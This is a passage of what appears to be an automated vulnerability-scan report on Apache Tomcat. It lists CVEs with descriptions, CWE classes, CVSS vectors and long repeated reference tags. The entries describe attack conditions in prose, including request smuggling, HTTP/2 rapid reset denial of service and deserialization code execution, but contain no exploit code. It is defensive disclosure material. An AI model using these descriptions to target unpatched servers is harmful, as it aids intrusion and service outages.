While investigating bug 64830 it was discovered that Apache Tomcat 10.0.0-M1 to 10.0.0-M9, 9.0.0-M1 to 9.0.39 and 8.5.0 to 8.5.59 could re-use an HTTP request header value from the previous stream received on an HTTP/2 connection for the request associated with the subsequent stream. While this would most likely lead to an error and the closure of the HTTP/2 connection, it is possible that information could leak between requests. CWE-200 Exposure of Sensitive Information to an Unauthorized Actor
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N/E:3.9/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:P/I:N/A:N References:
af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY security@apache.org - MAILING_LIST,THIRD_PARTY_ADVISORY security@apache.org - MAILING_LIST,THIRD_PARTY_ADVISORY security@apache.org - MAILING_LIST,VENDOR_ADVISORY security@apache.org - PATCH,THIRD_PARTY_ADVISORY security@apache.org - PATCH,THIRD_PARTY_ADVISORY security@apache.org - PATCH,THIRD_PARTY_ADVISORY security@apache.org - PATCH,THIRD_PARTY_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2021-25122 suppress
When responding to new h2c connection requests, Apache Tomcat versions 10.0.0-M1 to 10.0.0, 9.0.0.M1 to 9.0.41 and 8.5.0 to 8.5.61 could duplicate request headers and a limited amount of request body from one request to another meaning user A and user B could both see the results of user A's request. CWE-200 Exposure of Sensitive Information to an Unauthorized Actor
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N/E:3.9/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:P/I:N/A:N References:
af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY security@apache.org - MAILING_LIST,THIRD_PARTY_ADVISORY security@apache.org - MAILING_LIST,THIRD_PARTY_ADVISORY security@apache.org - MAILING_LIST,VENDOR_ADVISORY security@apache.org - PATCH,THIRD_PARTY_ADVISORY security@apache.org - PATCH,THIRD_PARTY_ADVISORY security@apache.org - PATCH,THIRD_PARTY_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2021-41079 suppress
Apache Tomcat 8.5.0 to 8.5.63, 9.0.0-M1 to 9.0.43 and 10.0.0-M1 to 10.0.2 did not properly validate incoming TLS packets. When Tomcat was configured to use NIO+OpenSSL or NIO2+OpenSSL for TLS, a specially crafted packet could be used to trigger an infinite loop resulting in a denial of service. CWE-20 Improper Input Validation, CWE-835 Loop with Unreachable Exit Condition ('Infinite Loop')
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:3.9/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:N/I:N/A:P References:
Vulnerable Software & Versions: (show all )
CVE-2022-42252 suppress
If Apache Tomcat 8.5.0 to 8.5.82, 9.0.0-M1 to 9.0.67, 10.0.0-M1 to 10.0.26 or 10.1.0-M1 to 10.1.0 was configured to ignore invalid HTTP headers via setting rejectIllegalHeader to false (the default for 8.5.x only), Tomcat did not reject a request containing an invalid Content-Length header making a request smuggling attack possible if Tomcat was located behind a reverse proxy that also failed to reject the request with the invalid header. CWE-444 Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling')
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N/E:3.9/RC:R/MAV:A References:
Vulnerable Software & Versions: (show all )
CVE-2023-44487 suppress
CISA Known Exploited Vulnerability: Product: IETF HTTP/2 Name: HTTP/2 Rapid Reset Attack Vulnerability Date Added: 2023-10-10 Description: HTTP/2 contains a rapid reset vulnerability that allows for a distributed denial-of-service attack (DDoS). Required Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable. Due Date: 2023-10-31 Notes: This vulnerability affects a common open-source component, third-party library, or protocol used by different products. For more information, please see: HTTP/2 Rapid Reset Vulnerability, CVE-2023-44487 | CISA: https://www.cisa.gov/news-events/alerts/2023/10/10/http2-rapid-reset-vulnerability-cve-2023-44487; https://blog.cloudflare.com/technical-breakdown-http2-rapid-reset-ddos-attack/; https://nvd.nist.gov/vuln/detail/CVE-2023-44487
The HTTP/2 protocol allows a denial of service (server resource consumption) because request cancellation can reset many streams quickly, as exploited in the wild in August through October 2023. CWE-400 Uncontrolled Resource Consumption, NVD-CWE-noinfo
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:3.9/RC:R/MAV:A References:
af854a3a-2127-422b-91ae-364da2661108 - BROKEN_LINK af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,MITIGATION,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,PATCH af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,PATCH af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,PATCH af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,PATCH af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,PATCH af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,PATCH af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,PATCH af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,PATCH af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,PATCH af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,PATCH af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,PATCH af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,PATCH af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,PATCH af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,PRESS/MEDIA_COVERAGE af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,PATCH,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,RELEASE_NOTES,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MITIGATION,PATCH,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MITIGATION,PATCH,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MITIGATION,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH af854a3a-2127-422b-91ae-364da2661108 - PATCH af854a3a-2127-422b-91ae-364da2661108 - PATCH af854a3a-2127-422b-91ae-364da2661108 - PATCH,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PRESS/MEDIA_COVERAGE af854a3a-2127-422b-91ae-364da2661108 - PRESS/MEDIA_COVERAGE,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PRESS/MEDIA_COVERAGE,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PRESS/MEDIA_COVERAGE,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PRESS/MEDIA_COVERAGE,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PRODUCT af854a3a-2127-422b-91ae-364da2661108 - PRODUCT af854a3a-2127-422b-91ae-364da2661108 - PRODUCT,RELEASE_NOTES af854a3a-2127-422b-91ae-364da2661108 - PRODUCT,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - RELEASE_NOTES af854a3a-2127-422b-91ae-364da2661108 - RELEASE_NOTES af854a3a-2127-422b-91ae-364da2661108 - RELEASE_NOTES,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - RELEASE_NOTES,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - TECHNICAL_DESCRIPTION,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - TECHNICAL_DESCRIPTION,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - TECHNICAL_DESCRIPTION,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY,US_GOVERNMENT_RESOURCE af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - VENDOR_ADVISORY cve@mitre.org - BROKEN_LINK cve@mitre.org - EXPLOIT,THIRD_PARTY_ADVISORY cve@mitre.org - EXPLOIT,THIRD_PARTY_ADVISORY cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING,MITIGATION,VENDOR_ADVISORY cve@mitre.org - ISSUE_TRACKING,PATCH cve@mitre.org - ISSUE_TRACKING,PATCH cve@mitre.org - ISSUE_TRACKING,PATCH cve@mitre.org - ISSUE_TRACKING,PATCH cve@mitre.org - ISSUE_TRACKING,PATCH cve@mitre.org - ISSUE_TRACKING,PATCH cve@mitre.org - ISSUE_TRACKING,PATCH cve@mitre.org - ISSUE_TRACKING,PATCH cve@mitre.org - ISSUE_TRACKING,PATCH cve@mitre.org - ISSUE_TRACKING,PATCH cve@mitre.org - ISSUE_TRACKING,PATCH cve@mitre.org - ISSUE_TRACKING,PATCH cve@mitre.org - ISSUE_TRACKING,PATCH cve@mitre.org - ISSUE_TRACKING,PRESS/MEDIA_COVERAGE cve@mitre.org - ISSUE_TRACKING,THIRD_PARTY_ADVISORY cve@mitre.org - ISSUE_TRACKING,VENDOR_ADVISORY cve@mitre.org - ISSUE_TRACKING,VENDOR_ADVISORY cve@mitre.org - ISSUE_TRACKING,VENDOR_ADVISORY cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST,PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,PATCH,VENDOR_ADVISORY cve@mitre.org - MAILING_LIST,RELEASE_NOTES,VENDOR_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,VENDOR_ADVISORY cve@mitre.org - MAILING_LIST,VENDOR_ADVISORY cve@mitre.org - MITIGATION,PATCH,VENDOR_ADVISORY cve@mitre.org - MITIGATION,PATCH,VENDOR_ADVISORY cve@mitre.org - MITIGATION,VENDOR_ADVISORY cve@mitre.org - PATCH cve@mitre.org - PATCH cve@mitre.org - PATCH cve@mitre.org - PATCH,VENDOR_ADVISORY cve@mitre.org - PATCH,VENDOR_ADVISORY cve@mitre.org - PRESS/MEDIA_COVERAGE cve@mitre.org - PRESS/MEDIA_COVERAGE,THIRD_PARTY_ADVISORY cve@mitre.org - PRESS/MEDIA_COVERAGE,THIRD_PARTY_ADVISORY cve@mitre.org - PRESS/MEDIA_COVERAGE,THIRD_PARTY_ADVISORY cve@mitre.org - PRESS/MEDIA_COVERAGE,THIRD_PARTY_ADVISORY cve@mitre.org - PRODUCT cve@mitre.org - PRODUCT cve@mitre.org - PRODUCT,RELEASE_NOTES cve@mitre.org - PRODUCT,THIRD_PARTY_ADVISORY cve@mitre.org - RELEASE_NOTES cve@mitre.org - RELEASE_NOTES cve@mitre.org - RELEASE_NOTES,THIRD_PARTY_ADVISORY cve@mitre.org - RELEASE_NOTES,VENDOR_ADVISORY cve@mitre.org - TECHNICAL_DESCRIPTION,VENDOR_ADVISORY cve@mitre.org - TECHNICAL_DESCRIPTION,VENDOR_ADVISORY cve@mitre.org - TECHNICAL_DESCRIPTION,VENDOR_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY,US_GOVERNMENT_RESOURCE cve@mitre.org - THIRD_PARTY_ADVISORY,VENDOR_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY,VENDOR_ADVISORY cve@mitre.org - VENDOR_ADVISORY cve@mitre.org - VENDOR_ADVISORY cve@mitre.org - VENDOR_ADVISORY cve@mitre.org - VENDOR_ADVISORY cve@mitre.org - VENDOR_ADVISORY cve@mitre.org - VENDOR_ADVISORY cve@mitre.org - VENDOR_ADVISORY cve@mitre.org - VENDOR_ADVISORY cve@mitre.org - VENDOR_ADVISORY cve@mitre.org - VENDOR_ADVISORY cve@mitre.org - VENDOR_ADVISORY cve@mitre.org - VENDOR_ADVISORY cve@mitre.org - VENDOR_ADVISORY cve@mitre.org - VENDOR_ADVISORY cve@mitre.org - VENDOR_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2023-46589 suppress
Improper Input Validation vulnerability in Apache Tomcat.Tomcat from 11.0.0-M1 through 11.0.0-M10, from 10.1.0-M1 through 10.1.15, from 9.0.0-M1 through 9.0.82 and from 8.5.0 through 8.5.95 did not correctly parse HTTP trailer headers. A trailer header that exceeded the header size limit could cause Tomcat to treat a single
request as multiple requests leading to the possibility of request
smuggling when behind a reverse proxy.
Users are recommended to upgrade to version 11.0.0-M11 onwards, 10.1.16 onwards, 9.0.83 onwards or 8.5.96 onwards, which fix the issue. CWE-444 Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling')
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N/E:3.9/RC:R/MAV:A References:
Vulnerable Software & Versions: (show all )
CVE-2024-24549 suppress
Denial of Service due to improper input validation vulnerability for HTTP/2 requests in Apache Tomcat. When processing an HTTP/2 request, if the request exceeded any of the configured limits for headers, the associated HTTP/2 stream was not reset until after all of the headers had been processed.This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.0-M16, from 10.1.0-M1 through 10.1.18, from 9.0.0-M1 through 9.0.85, from 8.5.0 through 8.5.98.
Users are recommended to upgrade to version 11.0.0-M17, 10.1.19, 9.0.86 or 8.5.99 which fix the issue. CWE-20 Improper Input Validation, NVD-CWE-noinfo
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:3.9/RC:R/MAV:A References:
Vulnerable Software & Versions: (show all )
CVE-2019-12418 suppress
When Apache Tomcat 9.0.0.M1 to 9.0.28, 8.5.0 to 8.5.47, 7.0.0 and 7.0.97 is configured with the JMX Remote Lifecycle Listener, a local attacker without access to the Tomcat process or configuration files is able to manipulate the RMI registry to perform a man-in-the-middle attack to capture user names and passwords used to access the JMX interface. The attacker can then use these credentials to access the JMX interface and gain complete control over the Tomcat instance. NVD-CWE-noinfo
CVSSv3:
Base Score: HIGH (7.0) Vector: CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H/E:1.0/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (4.4) Vector: /AV:L/AC:M/Au:N/C:P/I:P/A:P References:
af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY security@apache.org - MAILING_LIST,THIRD_PARTY_ADVISORY security@apache.org - MAILING_LIST,THIRD_PARTY_ADVISORY security@apache.org - MAILING_LIST,THIRD_PARTY_ADVISORY security@apache.org - MAILING_LIST,THIRD_PARTY_ADVISORY security@apache.org - MAILING_LIST,VENDOR_ADVISORY security@apache.org - PATCH,THIRD_PARTY_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2020-9484 suppress
When using Apache Tomcat versions 10.0.0-M1 to 10.0.0-M4, 9.0.0.M1 to 9.0.34, 8.5.0 to 8.5.54 and 7.0.0 to 7.0.103 if a) an attacker is able to control the contents and name of a file on the server; and b) the server is configured to use the PersistenceManager with a FileStore; and c) the PersistenceManager is configured with sessionAttributeValueClassNameFilter="null" (the default unless a SecurityManager is used) or a sufficiently lax filter to allow the attacker provided object to be deserialized; and d) the attacker knows the relative file path from the storage location used by FileStore to the file the attacker has control over; then, using a specifically crafted request, the attacker will be able to trigger remote code execution via deserialization of the file under their control. Note that all of conditions a) to d) must be true for the attack to succeed. CWE-502 Deserialization of Untrusted Data
CVSSv3:
Base Score: HIGH (7.0) Vector: CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H/E:1.0/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (4.4) Vector: /AV:L/AC:M/Au:N/C:P/I:P/A:P References:
